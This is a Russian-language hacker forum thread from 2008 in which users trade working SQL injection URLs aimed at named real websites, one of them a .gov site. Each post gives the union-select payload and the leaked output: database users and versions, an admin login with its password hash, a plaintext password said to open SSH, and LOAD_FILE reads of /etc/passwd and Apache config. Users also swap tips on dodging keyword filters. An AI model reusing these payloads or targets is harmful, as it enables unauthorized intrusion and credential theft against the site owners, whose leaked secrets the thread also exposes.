24.03.2008, 01:06
|
|
Новичок
Регистрация: 23.10.2007
Сообщений: 17
Провел на форуме:
105851
Репутация:
46
|
|
Код:
http://www.fwbusinesspress.com/frames.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user())/*
VERSION: 4.0.27-log
DATABASE: xbizpress
USER: xbizpress@escher.futurequest.net
PR: 4
***************************************
Всем срочно хостится:
Код:
http://dimi.pl/regulamin.php?id=-1+union+select+1,concat_ws(version(),database(),user())/*
VERSION: 4.1.11-Debian_4sarge8-log
DATABASE: usr_sat0_4
USER: sat0@localhost
PR: 3
Код:
http://dimi.pl/regulamin.php?id=-1+union+select+1,concat(login,char(58),pass)+from+admin/*
host247:3727ee3a03fac1457d6aa96e372ada0c
Последний раз редактировалось t0ox; 24.03.2008 в 02:08..
|
|
|
21.03.2008, 15:01
|
|
Banned
Регистрация: 14.03.2008
Сообщений: 36
Провел на форуме:
285523
Репутация:
9
|
|
поздравляю!
|
|
|
|
21.03.2008, 16:45
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
А вот и .GOV
_http://www. energycodes.gov/implement/state_codes/state_status.php?state_AB=P'+union+select+1,2,3,4, AES_DECRYPT(AES_ENCRYPT(concat(user(),char(58),ver sion(),char(58),database()),0x71),0x71),6,7,8,9,0, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37/*
stateinfo_read@ecodesvr.pnl.gov:5.0.18-log:stateinfo
фильтрация from, но кому надо обойдёт  |
|
|
|
21.03.2008, 18:20
|
|
Новичок
Регистрация: 19.03.2008
Сообщений: 6
Провел на форуме:
30775
Репутация:
1
|
|
Сообщение от jokester
А вот и .GOV
_http://www. energycodes.gov/implement/state_codes/state_status.php?state_AB=P'+union+select+1,2,3,4, AES_DECRYPT(AES_ENCRYPT(concat(user(),char(58),ver sion(),char(58),database()),0x71),0x71),6,7,8,9,0, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37/*
stateinfo_read@ecodesvr.pnl.gov:5.0.18-log:stateinfo
фильтрация from, но кому надо обойдёт Если не секрет, как фильтрацию from обойти?
Прочитал кучу мануалов, не нашел.
|
|
|
|
21.03.2008, 17:26
|
|
Новичок
Регистрация: 15.08.2007
Сообщений: 11
Провел на форуме:
37182
Репутация:
3
|
|
http://www.hardvision.ru/index.php3?dir=news&action=pc&id=-9918+union+select+null,null,null,concat(user,0x3a, password,0x3a,host),null,null,7,null+from+mysql.us er
пароль вроде был 'yf[eq', сейчас не знаю.. раньше пасс и подходил для ssh
|
|
|
|
21.03.2008, 21:54
|
|
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме:
1050662
Репутация:
435
|
|
Код:
http://www.canurb.com/events/event_details.php?id=-105+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3/*
5.0.45-community:canurb@localhost:canurb_cui
есть таблицы типа админ, юзер, но че то с ними не получилось =( |
|
|
|
22.03.2008, 14:41
|
|
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,205
Провел на форуме:
4778940
Репутация:
1257
|
|
hxxp://www.drivers-download.com/en/list.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
http://www.drivers-download.com/en/list.php?id=-1+union+select+1,2,LOAD_FILE('/etc/passwd'),4,5,6,7,8,9,10/*
5.0.19-standard
root@localhost
кто найдёт раскрытие путей скажите.
ЗЫ. из базы ничего толкового невытащил. кроме како-го то паса "123456" в md5. логин ненашол. админки или чего-то подобного тоже.
|
|
|
|
22.03.2008, 15:02
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от mr.The
кто найдёт раскрытие путей скажите.
Пути можешь сдесь посмотреть
_http://www.drivers-download.com/en/list.php?id=-1+union+select+1,2,LOAD_FILE('/etc/httpd/conf/httpd.conf'),4,5,6,7,8,9,10/*
|
|
|
|
22.03.2008, 15:52
|
|
Познающий
Регистрация: 21.03.2008
Сообщений: 39
Провел на форуме:
99208
Репутация:
21
|
|
todobulla.cl
http://www.todobulla.cl/show_videos.php?id=-46+union+select+0,1,concat(USER(),0x3a,VERSION(),0 x3a,DATABASE()),3/*
web7_u1@localhost:5.0.32-Debian_7etch1-log:web7_db1
Названия таблиц -
http://www.todobulla.cl/show_videos.php?id=-46+union+select+0,1,2,table_name+from+information_ schema.tables/*
Названия столбцов -
http://www.todobulla.cl/show_videos.php?id=-46+union+select+0,1,2,column_name+from+information _schema.columns/*
|
|
|
|
22.03.2008, 23:34
|
|
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509
Репутация:
338
|
|
Код:
http://www.budgiemania.com/modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*
http://www.tieltown.com/modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*
http://www.parrotrecipes.com/modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*
http://lawyerintl.com/modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
Отвечаю мне так впадлу оформлять  |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
